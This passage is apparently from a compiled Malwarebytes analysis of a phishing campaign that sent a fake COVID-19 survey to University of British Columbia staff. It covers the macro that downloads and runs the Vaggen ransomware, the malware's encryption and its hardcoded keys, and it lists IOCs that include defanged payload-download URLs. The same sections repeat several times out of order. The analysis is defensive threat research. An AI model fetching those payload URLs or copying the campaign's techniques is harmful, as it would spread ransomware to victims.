(notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 95 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 96 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 97 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 98 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 99 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 100 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 101 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 102 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 103 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 104 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 105 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 106 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 107 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 108 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 109 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 110 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 111 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 112 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 113 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 114 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 115 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 116 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 117 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 118 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 119 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 120 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 121 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 122 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 123 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 124 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 125 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis 